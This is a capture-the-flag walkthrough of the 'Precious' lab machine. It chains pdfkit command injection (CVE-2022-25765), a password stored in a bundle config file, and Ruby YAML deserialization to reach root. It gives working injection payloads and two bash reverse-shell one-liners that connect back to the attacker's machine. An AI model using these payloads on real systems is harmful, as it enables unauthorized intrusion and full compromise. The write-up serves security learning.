Precious an easy rated linux machine which involved a site converting web pages to PDF using pdfkit which was vulnerable to command injection (CVE-2022–25765), giving us a shell as ruby user, password for henry was found through bundle config file, with henry a dependency checker script can be ran as root user which was using yaml.load vulnerable to ruby deserialization.
NMAP
Nmap scan report for 10.10.11.189
Host is up (1.5s latency).
Not shown: 63496 closed tcp ports (reset), 2037 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 84:5e:13:a8:e3:1e:20:66:1d:23:55:50:f6:30:47:d2 (RSA)
| 256 a2:ef:7b:96:65:ce:41:61:c4:67:ee:4e:96:c7:c8:92 (ECDSA)
|_ 256 33:05:3d:cd:7a:b7:98:45:82:39:e7:ae:3c:91:a6:58 (ED25519)
80/tcp open http nginx 1.18.0
|_http-title: Did not follow redirect to http://precious.htb/
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.18.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelPORT 80 (HTTP)
Visiting the web server, it redirects to precious.htb
Adding the domain in /etc/hosts file
Here we can input a url for the web page which will convert it into a pdf file, on trying http://localhost and http://127.0.0.1 it doesn't allow them
Trying a remote url did worked
Foothold
Running exiftool on the generated pdf, we'll see the version of pdfkit
Which reveals that this version is vulnerable to command injection CVE-2022-25765
Following the commits being made on pdfkit and snyk, it needs http:// at the beginning and the with back ticks we can can include shell command
http://%20`ping 10.10.14.72`We can see the machine sending ICMP packets to our machine from here we can get a shell using bash payload
http://%20`/bin/bash -c "bash -i >& /dev/tcp/10.10.14.72/4444 0>&1"`Running pspy doesn’t show anything interesting
Privilege Escalation (henry)
Going into ruby's home directory, we can see .bundle foldder which has henry's password
Privilege Escalation (root)
Doing sudo -l we can see this user can run /opt/update_dependencies.rb file as root user
This script will read try to read dependency.yaml file and will compare yaml and pdfkit it’s version
Since it’s reading yaml, this can abused with ruby deserilization because of yaml.load, by creating a dependency.yaml file in a directory where henry has write access
On replacing the id command in the yaml file with bash reverse shell, we’ll get root shell.
/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.92/2222 0>&1'
